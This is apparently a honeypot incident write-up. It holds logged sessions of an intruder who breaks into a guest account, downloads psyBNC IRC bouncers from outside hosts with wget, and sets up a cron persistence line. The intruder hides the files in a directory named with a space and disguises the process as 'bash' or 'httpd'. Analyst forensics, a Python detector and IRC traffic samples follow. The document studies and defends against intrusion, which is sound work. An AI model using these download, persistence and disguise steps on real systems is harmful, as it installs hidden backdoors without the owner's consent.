bash-3.1$ w
23:23:07 up 2 days, 14:05, 2 users, load average: 1.96, 1.05, 0.42
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
guest pts/0 210.207.152.69 23:18 4:11 0.00s 0.06s sshd: guest [pr
guest pts/2 62.118.0.131 23:20 0.00s 0.01s 0.02s sshd: guest [pr
bash-3.1$ kill -9 28389
bash-3.1$ w
23:23:24 up 2 days, 14:06, 1 user, load average: 1.97, 1.09, 0.44
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
guest pts/2 62.118.0.131 23:20 0.00s 0.01s 0.02s sshd: guest [pr
bash-3.1$ kill -9 0
STOP at: Sun Feb 22 23:23:31 2009
The intruder installed psyBNC after breaking into the guest account
START at: Thu Feb 26 03:28:59 2009
bash-3.1$
bash-3.1$ a
bash: a: command not found
bash-3.1$ cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
[delete].99.129 [delete]1 [delete]1.[HoneyPot Domain]
[Honey Pot IP] pc18 pc18.[HoneyPot Domain]
127.0.0.1 localhost localhost.localdomain
::1 localhost6.localdomain6 localhost6
bash-3.1$ uname -a
Linux pc18 2.6.18-53.1.14.el5 #1 SMP Wed Mar 5 11:36:49 EST 2008 i686 i686 i386 GNU/Linux
bash-3.1$ passwd
Changing password for user guest.
Changing password for guest
(current) UNIX password:
New UNIX password:
Retype new UNIX password:
Sorry, passwords do not match.
New UNIX password:
BAD PASSWORD: is too similar to the old one
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
bash-3.1$ cd /tmp
bash-3.1$ ls
bash-3.1$ wget
wget: missing URL
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
bash-3.1$ ls
bash-3.1$ cd /tmp
bash-3.1$ mkdir " "
bash-3.1$ cd " "
bash-3.1$ wget gabanu.webng.com/redone.tar.gz
--03:32:32-- http://gabanu.webng.com/redone.tar.gz
Resolving gabanu.webng.com... 38.100.19.122, 38.100.19.123
Connecting to gabanu.webng.com|38.100.19.122|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 471040 (460K) [application/x-gzip]
Saving to: `redone.tar.gz'
03:32:51 (40.2 KB/s) - `redone.tar.gz' saved [471040/471040]
bash-3.1$ tar xvf redone.tar.gz
redone/
redone/scripts/
redone/scripts/INFO
redone/scripts/DEFAULT.SCRIPT
redone/scripts/example/
redone/scripts/example/DEFAULT.SCRIPT
redone/lang/
redone/lang/INFO
redone/lang/english.lng
redone/motd/
redone/motd/INFO
redone/kik
redone/proc
redone/psybnc.conf
redone/httpd
redone/hide
redone/run
redone/config
redone/log/
redone/log/INFO
redone/help/
redone/help/DCCCHAT.TXT
....
....
....
redone/help/ENCRYPT.TXT
redone/help/LINKFROM.TXT
redone/help/BREHASH.TXT
redone/help/SETUSERNAME.TXT
redone/fuck
redone/config.h
bash-3.1$ cd redone
bash-3.1$ ls
config fuck hide kik log proc run
config.h help httpd lang motd psybnc.conf scripts
bash-3.1$ ./config private 31337
PSYBNC Configure By ReD_oNe
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
USER0.USER.LOGIN=private
USER0.USER.PASS=*
USER0.USER.RIGHTS=1
bash-3.1$ ./fuck
* * * * * /tmp/ /redone/y2kupdate >/dev/null 2>&1
bash-3.1$ ./run
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.3.1 (c) 1999-2002
the most psychoid
and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: redone
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 31337
psyBNC2.3.1-cBtITLdDMSNp started (PID 7847)
bash-3.1$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
radiusd:x:95:95:radiusd user:/:/bin/false
squid:x:23:23::/var/spool/squid:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/bash
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
cto:x:30004:30004:Chief Technical Officer:/home/cto:/sbin/bash
guest:x:30005:30005:Demo guest account:/home/guest:/sbin/bash
demo:x:30006:30006:Demo for IEE:/home/demo:/sbin/bash
bash-3.1$
STOP at: Thu Feb 26 03:35:55 2009
The intruder disguised the running psyBNC process as a shell program
START at: Sat Mar 21 19:44:33 2009
ls
bash: cd: /tmpls: No such file or directory
bash-3.1$ cd /tmp/" "
bash-3.1$ ls
bash-3.1$ wget http://helpbnc.ucoz.net/stuff/PsyLinux.tgz
--19:44:56-- http://helpbnc.ucoz.net/stuff/PsyLinux.tgz
Resolving helpbnc.ucoz.net... 208.100.61.2
Connecting to helpbnc.ucoz.net|208.100.61.2|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 573709 (560K) [application/octet-stream]
Saving to: `PsyLinux.tgz'
19:45:01 (163 KB/s) - `PsyLinux.tgz' saved [573709/573709]
bash-3.1$ tar zxvf PsyLinux.tgz
psybnc/
psybnc/makefile.out
psybnc/tools/
psybnc/tools/chkenv
psybnc/tools/sys
....
.....
......
psybnc/src/p_idea.c
psybnc/src/bsd-setenv.c
psybnc/src/ssl.cnf
psybnc/src/p_crypt.c
psybnc/CHANGES
psybnc/psybnc
psybnc/motd/
psybnc/motd/INFO
psybnc/FAQ
psybnc/Makefile
bash-3.1$ cd psybnc
bash-3.1$ ls
CHANGES README help makesalt psybnc.conf src
COPYING SCRIPTING lang menuconf psybncchk targets.mak
FAQ TODO log motd salt.h tools
Makefile config.h makefile.out psybnc scripts
bash-3.1$ mv psybnc bash
bash-3.1$ chmod +x *
bash-3.1$ cat psybnc.conf
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
bash-3.1$ PATH+'.'
bash: PATH+.: command not found
bash-3.1$ PAth='.'
bash-3.1$ bash
[guest@pc18 psybnc]$ PATH='.'
[guest@pc18 psybnc]$ bash
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.3.2-4 (c) 1999-2003
the most psychoid
and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 31337
psyBNC2.3.2-4-cBtITLdDMSNp started (PID 29855)
[guest@pc18 psybnc]$
STOP at: Sat Mar 21 19:47:24 2009
START at: Wed Mar 25 20:50:55 2009
ls
bash: /tmls: No such file or directory
bash-3.1$ cd /tmp
bash-3.1$ ls
bash-3.1$ cd " "
bash-3.1$ ls
PsyLinux.tgz psybnc
bash-3.1$ ps -x
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
PID TTY STAT TIME COMMAND
15611 ? S 0:00 bash
15625 ? S 0:00 sshd: guest@pts/0
15627 pts/1 Ss 0:00 /bin/bash
15638 pts/1 R+ 0:00 ps -x
bash-3.1$ kill -9 15611
bash-3.1$ ls
PsyLinux.tgz psybnc
bash-3.1$ cd psybnc/
bash-3.1$ ls
CHANGES SCRIPTING lang motd salt.h
COPYING TODO log psybnc.conf scripts
FAQ bash makefile.out psybnc.conf.old src
Makefile config.h makesalt psybnc.pid targets.mak
README help menuconf psybncchk tools
bash-3.1$ mv bash sh
bash-3.1$ PATH='.'
bash-3.1$ sh
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.3.2-4 (c) 1999-2003
the most psychoid
and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 31337
psyBNC2.3.2-4-cBtITLdDMSNp started (PID 15643)
bash-3.1$
STOP at: Wed Mar 25 20:54:15 2009
Examining the honeypot processes
Script started on Thu 16 Apr 2009 08:57:27 AM HKT
fortress:/root> ssh pc18
Last login: Wed Apr 15 09:44:37 2009 from [delete]-fw.[HoneyPot Domain]
[root@pc18 ~]# tcsh
[root@pc18 ~]# cd
pc18:/root> cd /tmp
pc18:/tmp> ls
/ ./ ../ .font-unix/ .ICE-unix/
pc18:/tmp> cd " "
pc18:/tmp/ > ls
./ ../
pc18:/tmp/ > ls -lR
.:
total 12
drwxr-xr-x 2 guest guest 4096 Apr 16 04:34 ./
drwxrwxrwt 5 root root 4096 Apr 12 04:25 ../
pc18:/tmp/ > ls -lR
.:
total 12
drwxr-xr-x 2 guest guest 4096 Apr 16 04:34 ./
drwxrwxrwt 5 root root 4096 Apr 12 04:25 ../
pc18:/tmp/ > ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Mar01 ? 00:00:01 init [3]
root 2 1 0 Mar01 ? 00:00:00 [migration/0]
root 3 1 0 Mar01 ? 00:00:03 [ksoftirqd/0]
root 4 1 0 Mar01 ? 00:00:00 [watchdog/0]
root 5 1 0 Mar01 ? 00:00:01 [events/0]
root 6 1 0 Mar01 ? 00:00:00 [khelper]
root 7 1 0 Mar01 ? 00:00:00 [kthread]
root 10 7 0 Mar01 ? 00:00:07 [kblockd/0]
root 11 7 0 Mar01 ? 00:00:00 [kacpid]
root 67 7 0 Mar01 ? 00:00:00 [cqueue/0]
root 70 7 0 Mar01 ? 00:00:00 [khubd]
root 72 7 0 Mar01 ? 00:00:00 [kseriod]
root 135 7 0 Mar01 ? 00:00:02 [pdflush]
root 136 7 0 Mar01 ? 00:00:02 [pdflush]
root 137 7 0 Mar01 ? 00:01:10 [kswapd0]
root 138 7 0 Mar01 ? 00:00:00 [aio/0]
root 291 7 0 Mar01 ? 00:00:00 [kpsmoused]
root 320 7 0 Mar01 ? 00:00:00 [scsi_eh_0]
root 321 7 0 Mar01 ? 00:00:50 [kjournald]
root 349 7 0 Mar01 ? 00:00:00 [kauditd]
root 383 1 0 Mar01 ? 00:00:00 /sbin/udevd -d
root 681 7 0 Mar01 ? 00:00:00 [ata/0]
root 682 7 0 Mar01 ? 00:00:00 [ata_aux]
root 1060 7 0 Mar01 ? 00:00:00 [kmpathd/0]
root 1536 1 0 Mar01 ? 00:00:11 auditd
root 1538 1536 0 Mar01 ? 00:00:12 python /sbin/audispd
root 1557 1 0 Mar01 ? 00:00:15 syslogd -m 0
root 1560 1 0 Mar01 ? 00:00:00 klogd -x
rpc 1677 1 0 Mar01 ? 00:00:00 portmap
rpcuser 1703 1 0 Mar01 ? 00:00:00 rpc.statd
root 1749 1 0 Mar01 ? 00:00:00 rpc.idmapd
root 1839 1 0 Mar01 ? 00:01:22 /usr/sbin/vmware-guestd --background /var/run/vmware-guestd.pid
dbus 1862 1 0 Mar01 ? 00:00:00 dbus-daemon --system
root 1910 1 0 Mar01 ? 00:00:00 pcscd
root 1935 1 0 Mar01 ? 00:00:00 /usr/sbin/acpid
root 1954 1 0 Mar01 ? 00:00:05 /usr/sbin/sshd
root 1971 1 0 Mar01 ? 00:00:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
ntp 1990 1 0 Mar01 ? 00:00:00 ntpd -u ntp:ntp -p /var/run/ntpd.pid -g
root 2032 1 0 Mar01 ? 00:00:00 sendmail: accepting connections
smmsp 2040 1 0 Mar01 ? 00:00:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
root 2057 1 0 Mar01 ? 00:00:00 gpm -m /dev/input/mice -t exps2
root 2099 1 0 Mar01 ? 00:00:10 crond
root 2126 1 0 Mar01 ? 00:00:00 squid -D
squid 2128 2126 0 Mar01 ? 00:00:24 (squid) -D
squid 2130 2128 0 Mar01 ? 00:00:00 (unlinkd)
xfs 2166 1 0 Mar01 ? 00:00:00 xfs -droppriv -daemon
apache 2187 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
apache 2188 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
apache 2189 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
apache 2190 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
apache 2191 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
apache 2192 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
apache 2193 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
apache 2194 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
root 2197 1 0 Mar01 ? 00:00:00 /usr/sbin/atd
apache 2202 6576 0 Apr13 ? 00:00:00 /usr/sbin/httpd
68 2213 1 0 Mar01 ? 00:00:00 hald
root 2214 2213 0 Mar01 ? 00:00:00 hald-runner
68 2221 2214 0 Mar01 ? 00:00:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
68 2228 2214 0 Mar01 ? 00:00:00 hald-addon-keyboard: listening on /dev/input/event0
root 2237 2214 0 Mar01 ? 00:00:32 hald-addon-storage: polling /dev/hdc
root 2261 1 0 Mar01 ? 00:00:00 /usr/bin/perl -w /bin/ntpmon
root 2264 1 0 Mar01 tty1 00:00:00 /sbin/mingetty tty1
root 2265 1 0 Mar01 tty2 00:00:00 /sbin/mingetty tty2
root 2276 1 0 Mar01 tty3 00:00:00 /sbin/mingetty tty3
root 2279 1 0 Mar01 tty4 00:00:00 /sbin/mingetty tty4
root 2282 1 0 Mar01 tty5 00:00:00 /sbin/mingetty tty5
root 2283 1 0 Mar01 tty6 00:00:00 /sbin/mingetty tty6
root 6574 1 0 Mar24 ? 00:00:00 /usr/sbin/nss_pcache off /etc/httpd/alias
root 6576 1 0 Mar24 ? 00:00:02 /usr/sbin/httpd
guest 6599 1 0 Apr08 ? 00:01:38 /usr/local/apache/bin/httpd -DSSL
named 10374 1 0 Apr08 ? 00:00:23 /usr/sbin/named -u named
guest 14522 1 0 04:44 ? 00:00:00 bash
root 15451 1954 0 08:57 ? 00:00:00 sshd: root@pts/0
root 15453 15451 0 08:57 pts/0 00:00:00 -bash
root 15481 15453 0 08:57 pts/0 00:00:00 -csh
root 15521 15481 0 08:58 pts/0 00:00:00 ps -ef
apache 27549 6576 0 Apr12 ? 00:00:00 /usr/sbin/httpd
pc18:/tmp/ > ps -ef|grep guest
root 1839 1 0 Mar01 ? 00:01:22 /usr/sbin/vmware-guestd --background /var/run/vmware-guestd.pid
guest 6599 1 0 Apr08 ? 00:01:38 /usr/local/apache/bin/httpd -DSSL ? redone
guest 14522 1 0 04:44 ? 00:00:00 bash
pc18:/tmp/ > lsof -p 6599
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
httpd 6599 guest cwd DIR 8,1 0 1317314 /tmp/ /redone (deleted)
httpd 6599 guest rtd DIR 8,1 4096 2 /
httpd 6599 guest txt REG 8,1 202544 1317318 /tmp/ /redone/httpd (deleted)
httpd 6599 guest mem REG 8,1 76400 426061 /lib/libresolv-2.5.so
httpd 6599 guest mem REG 8,1 125736 425986 /lib/ld-2.5.so
httpd 6599 guest mem REG 8,1 1589908 426002 /lib/libc-2.5.so
httpd 6599 guest mem REG 8,1 208352 426025 /lib/libm-2.5.so
httpd 6599 guest mem REG 8,1 46680 426024 /lib/libnss_files-2.5.so
httpd 6599 guest mem REG 8,1 21788 426022 /lib/libnss_dns-2.5.so
httpd 6599 guest 0u CHR 136,4 6 /dev/pts/4 (deleted)
httpd 6599 guest 1u CHR 136,4 6 /dev/pts/4 (deleted)
httpd 6599 guest 2u CHR 136,4 6 /dev/pts/4 (deleted)
httpd 6599 guest 3u IPv4 2774371 TCP *:acmsoda (LISTEN)
httpd 6599 guest 4w REG 8,1 21577 1409728 /tmp/ /redone/log/psybnc.log.old (deleted)
httpd 6599 guest 5w REG 8,1 5 1317329 /tmp/ /redone/psybnc.pid (deleted)
httpd 6599 guest 6u IPv4 3238239 TCP pc18:4144->Tampa.FL.US.Undernet.org:ircd (CLOSE_WAIT)
httpd 6599 guest 7w REG 8,1 0 1409729 /tmp/ /redone/log/USER1.TRL (deleted)
httpd 6599 guest 8u IPv4 3277295 TCP pc18:4759->undernet.xs4all.nl:6669 (CLOSE_WAIT)
httpd 6599 guest 9w REG 8,1 0 1409732 /tmp/ /redone/log/USER2.TRL (deleted)
httpd 6599 guest 10u IPv4 3276160 TCP pc18:acmsoda->pc19.supernet.logicomp-data.1stclass.ro:sbl (CLOSE_WAIT)
httpd 6599 guest 11u sock 0,5 3279588 can't identify protocol
httpd 6599 guest 12u IPv4 3279548 UDP pc18:de-cache-query->[delete]1:domain
pc18:/tmp/ > lsof -p 14522
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
bash 14522 guest cwd DIR 8,1 4096 1409630 /home/guest/ /psybnc
bash 14522 guest rtd DIR 8,1 4096 2 /
bash 14522 guest txt REG 8,1 210248 1417464 /home/guest/ /psybnc/bash
bash 14522 guest mem REG 8,1 21788 426022 /lib/libnss_dns-2.5.so
bash 14522 guest mem REG 8,1 46680 426024 /lib/libnss_files-2.5.so
bash 14522 guest mem REG 8,1 76400 426061 /lib/libresolv-2.5.so
bash 14522 guest mem REG 8,1 125736 425986 /lib/ld-2.5.so
bash 14522 guest mem REG 8,1 1589908 426002 /lib/libc-2.5.so
bash 14522 guest mem REG 8,1 208352 426025 /lib/libm-2.5.so
bash 14522 guest 0u CHR 136,2 4 /dev/pts/2 (deleted)
bash 14522 guest 1u CHR 136,2 4 /dev/pts/2 (deleted)
bash 14522 guest 2u CHR 136,2 4 /dev/pts/2 (deleted)
bash 14522 guest 3u IPv4 3281690 TCP *:31337 (LISTEN)
bash 14522 guest 4w REG 8,1 574 1417469 /home/guest/ /psybnc/log/psybnc.log
bash 14522 guest 5w REG 8,1 6 1417470 /home/guest/ /psybnc/psybnc.pid
bash 14522 guest 7w REG 8,1 0 1417472 /home/guest/ /psybnc/log/USER1.TRL
bash 14522 guest 8u IPv4 3281720 TCP pc18:video-activmail->Tampa.FL.US.Undernet.org:ircd (ESTABLISHED)
pc18:/tmp/ > cd /home/quest
/home/quest: No such file or directory.
pc18:/tmp/ > cd /home/guest /" "/
pc18:/home/guest/ > ls
./ ../ psybnc/ PsyLinux.tgz
pc18:/home/guest/ > cd psybnc/
pc18:/home/guest/ /psybnc> ls -tlr
total 420
-rwxr-xr-x 1 guest guest 369 Aug 9 2000 psybncchk*
-rwxr-xr-x 1 guest guest 17982 Mar 26 2001 COPYING*
-rwxr-xr-x 1 guest guest 15738 Jul 15 2001 SCRIPTING*
-rwxr-xr-x 1 guest guest 3901 Jan 12 2002 targets.mak*
-rwxr-xr-x 1 guest guest 929 May 7 2002 config.h*
-rwxr-xr-x 1 guest guest 3560 Jul 25 2003 FAQ*
-rwxr-xr-x 1 guest guest 35624 Jul 26 2003 README*
-rwxr-xr-x 1 guest guest 2137 Sep 26 2003 Makefile*
-rwxr-xr-x 1 guest guest 1618 Sep 26 2003 TODO*
-rwxr-xr-x 1 guest guest 34872 Jun 25 2004 CHANGES*
-rwxr-xr-x 1 guest guest 947 Jan 6 2006 salt.h*
-rwxr-xr-x 1 guest guest 8090 Jan 6 2006 makesalt*
-rwxr-xr-x 1 guest guest 731 Jan 6 2006 makefile.out*
-rwxr-xr-x 1 guest guest 210248 Jan 6 2006 bash*
drwxr-xr-x 2 guest guest 4096 Jul 16 2007 src/
drwxr-xr-x 3 guest guest 4096 Jul 16 2007 scripts/
drwxr-xr-x 3 guest guest 4096 Jul 16 2007 menuconf/
drwxr-xr-x 2 guest guest 4096 Jul 16 2007 lang/
drwxr-xr-x 2 guest guest 12288 Jul 16 2007 help/
drwxr-xr-x 2 guest guest 4096 Jul 16 2007 tools/
drwxr-xr-x 3 guest guest 4096 Apr 16 04:43 ../
-rw------- 1 guest guest 6 Apr 16 04:44 psybnc.pid
drwxr-xr-x 2 guest guest 4096 Apr 16 04:44 log/
drwxr-xr-x 2 guest guest 4096 Apr 16 04:45 motd/
-rw------- 1 guest guest 1040 Apr 16 04:51 psybnc.conf.old
-rw------- 1 guest guest 1040 Apr 16 04:58 psybnc.conf
drwxr-xr-x 10 guest guest 4096 Apr 16 04:58 ./
pc18:/home/guest/ /psybnc> cd /proc/6599
pc18:/proc/6599> ls -l
total 0
dr-xr-xr-x 5 guest guest 0 Apr 16 00:06 ./
dr-xr-xr-x 92 root root 0 Mar 1 17:40 ../
dr-xr-xr-x 2 guest guest 0 Apr 16 09:02 attr/
-r-------- 1 guest guest 0 Apr 16 09:02 auxv
-r--r--r-- 1 guest guest 0 Apr 16 06:30 cmdline
-r--r--r-- 1 guest guest 0 Apr 16 09:02 cpuset
lrwxrwxrwx 1 guest guest 0 Apr 16 08:58 cwd -> /tmp/ /redone (deleted)
-r-------- 1 guest guest 0 Apr 16 09:02 environ
lrwxrwxrwx 1 guest guest 0 Apr 16 08:58 exe -> /tmp/ /redone/httpd (deleted)
dr-x------ 2 guest guest 0 Apr 16 08:58 fd/
-rw-r--r-- 1 guest guest 0 Apr 16 09:02 loginuid
-r--r--r-- 1 guest guest 0 Apr 16 08:58 maps
-rw------- 1 guest guest 0 Apr 16 09:02 mem
-r--r--r-- 1 guest guest 0 Apr 16 09:02 mounts
-r-------- 1 guest guest 0 Apr 16 09:02 mountstats
-rw-r--r-- 1 guest guest 0 Apr 16 09:02 oom_adj
-r--r--r-- 1 guest guest 0 Apr 16 09:02 oom_score
lrwxrwxrwx 1 guest guest 0 Apr 16 08:58 root -> //
-r--r--r-- 1 guest guest 0 Apr 16 09:02 schedstat
-r-------- 1 guest guest 0 Apr 16 09:02 smaps
-r--r--r-- 1 guest guest 0 Apr 16 08:58 stat
-r--r--r-- 1 guest guest 0 Apr 16 09:02 statm
-r--r--r-- 1 guest guest 0 Apr 16 06:30 status
dr-xr-xr-x 3 guest guest 0 Apr 16 09:02 task/
-r--r--r-- 1 guest guest 0 Apr 16 09:02 wchan
pc18:/proc/6599> cat exe > /tmp/httpd
pc18:/proc/6599> ls -l /tmp/httpd
-rw-r--r-- 1 root root 202544 Apr 16 09:02 /tmp/httpd
pc18:/proc/6599> rm /tmp/httpd
rm: remove regular file `/tmp/httpd'? yes
pc18:/proc/6599> exit
exit
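A small detector, added here as an example and not part of the honeypot log, that performs the analyst's lsof checks above mechanically. It parses lsof -p style rows (the sample rows are constructed from the transcript's PIDs 6599 and 14522) and flags the traits both intrusions share: an executable or working directory unlinked after start, a path under /tmp or inside a whitespace-only directory such as " ", a shell-named process holding sockets, and a process that both listens on TCP and talks to IRC ports. The regex parser is needed because the " " directory puts a space inside lsof's NAME column.

```python
import re

# Constructed sample: lsof -p rows trimmed from the transcript above
# (PIDs 6599 and 14522). The directory named " " puts a space inside NAME,
# so plain whitespace splitting would misparse these rows.
SAMPLE_LSOF = """\
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
httpd 6599 guest cwd DIR 8,1 0 1317314 /tmp/ /redone (deleted)
httpd 6599 guest txt REG 8,1 202544 1317318 /tmp/ /redone/httpd (deleted)
httpd 6599 guest 3u IPv4 2774371 TCP *:acmsoda (LISTEN)
httpd 6599 guest 6u IPv4 3238239 TCP pc18:4144->Tampa.FL.US.Undernet.org:ircd (CLOSE_WAIT)
httpd 6599 guest 8u IPv4 3277295 TCP pc18:4759->undernet.xs4all.nl:6669 (CLOSE_WAIT)
bash 14522 guest cwd DIR 8,1 4096 1409630 /home/guest/ /psybnc
bash 14522 guest txt REG 8,1 210248 1417464 /home/guest/ /psybnc/bash
bash 14522 guest 3u IPv4 3281690 TCP *:31337 (LISTEN)
bash 14522 guest 8u IPv4 3281720 TCP pc18:video-activmail->Tampa.FL.US.Undernet.org:ircd (ESTABLISHED)
"""

# COMMAND PID USER FD TYPE DEVICE [SIZE] NODE NAME; SIZE is absent for sockets.
LSOF_RE = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+(?P<fd>\S+)\s+(?P<type>\S+)\s+"
    r"(?P<dev>\S+)\s+(?:(?P<size>\d+)\s+)?(?P<node>\S+)\s+(?P<name>.*)$"
)
IRC_PORTS = {"ircd", "6667", "6668", "6669"}
SHELL_NAMES = {"bash", "sh", "dash", "ksh", "zsh", "csh", "tcsh"}


def parse_lsof(text):
    """Group parsed lsof rows by PID; the header line is skipped."""
    rows = {}
    for line in text.splitlines()[1:]:
        m = LSOF_RE.match(line)
        if m:
            rows.setdefault(int(m["pid"]), []).append(m.groupdict())
    return rows


def hidden_component(path):
    """True if a directory component of path is made only of spaces or dots."""
    return any(c and c.strip(" .") == "" for c in path.split("/"))


def remote_port(name):
    """Extract the remote port or service from 'local->host:port (STATE)'."""
    m = re.search(r"->\S+:(\S+)", name)
    return m.group(1) if m else None


def analyze(rows):
    """Return {pid: [finding, ...]} for processes that look like a hidden bouncer."""
    findings = {}
    for pid, fds in rows.items():
        notes, cmd = [], fds[0]["cmd"]
        listens = irc = False
        for fd in fds:
            name = fd["name"]
            if fd["fd"] in ("txt", "cwd"):
                if "(deleted)" in name:
                    notes.append(f"{fd['fd']} unlinked after start: {name}")
                if name.startswith("/tmp/") or hidden_component(name):
                    notes.append(f"{fd['fd']} in temp or hidden-name directory: {name}")
            elif fd["type"].startswith("IPv"):
                listens |= "(LISTEN)" in name
                irc |= remote_port(name) in IRC_PORTS
        if listens and irc:
            notes.append("listens on TCP and talks to IRC: bouncer-like")
        if cmd in SHELL_NAMES and any(f["type"].startswith("IPv") for f in fds):
            notes.append(f"shell-named process '{cmd}' owns network sockets")
        if notes:
            findings[pid] = notes
    return findings


if __name__ == "__main__":
    for pid, notes in analyze(parse_lsof(SAMPLE_LSOF)).items():
        print(pid, *("  - " + n for n in notes), sep="\n")
```

On a live host the same rows come from `lsof -p <pid>` (or, more robustly, `lsof -F` field output) for each PID that `ps -ef` shows running as an unexpected user from / or /tmp.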
IRC traffic sample
International: user that is the root .. is anyone on the local ..
International: if you give me someone to root flood :))..
_keech: sheep may be in luck and catch at least one root: D.
Baned #: 22 I did not just root Scanning with php ..
# N.A.S.A: you have a root with php? ..
International: root that had 180 days up `and nobody entered him :))..
oz: I had a root ..
oz: director at the bank
Top 5 URIs that have appeared in the IRC data
On port 31337
155 http://radiokyky.ghcomm.net:8080/listen.pls
10 http://eliteradio.info:8181/listen.pls
8 http://cservice.undernet.org/live/view_app.php?id=1238682998-9084&back=checkapp
8 http://bsh.ro
6 http://staudeasuprata.hi5.com
On port 6667
471 http://radiokyky.ghcomm.net:8080/listen.pls
73 http://bsh.ro
32 http://www.eastside.ro
26 http://asculta.radioliberty.ro:1989/listen.pls
22 http://cservice.undernet.org/live/view_app.php?id=1238751547-147470&ba
On port 6669
2 http://phlo0.ucoz.de/psydarwin.tgz
2 http://alexandrucordea.ws
1 http://www.youtube.com/watch?v=wxuwycmsrto&nr=1
1 http://www.youtube.com/watch?v=mghqs3wk27w
1 http://www.youtube.com/watch?v=_5pysbiaxvs&nr=1
On port 6969
26 http://cservice.undernet.org/live/view_app.php?id=1239110902-9084&back=checkapp
7 http://www.mirc.com/get.html
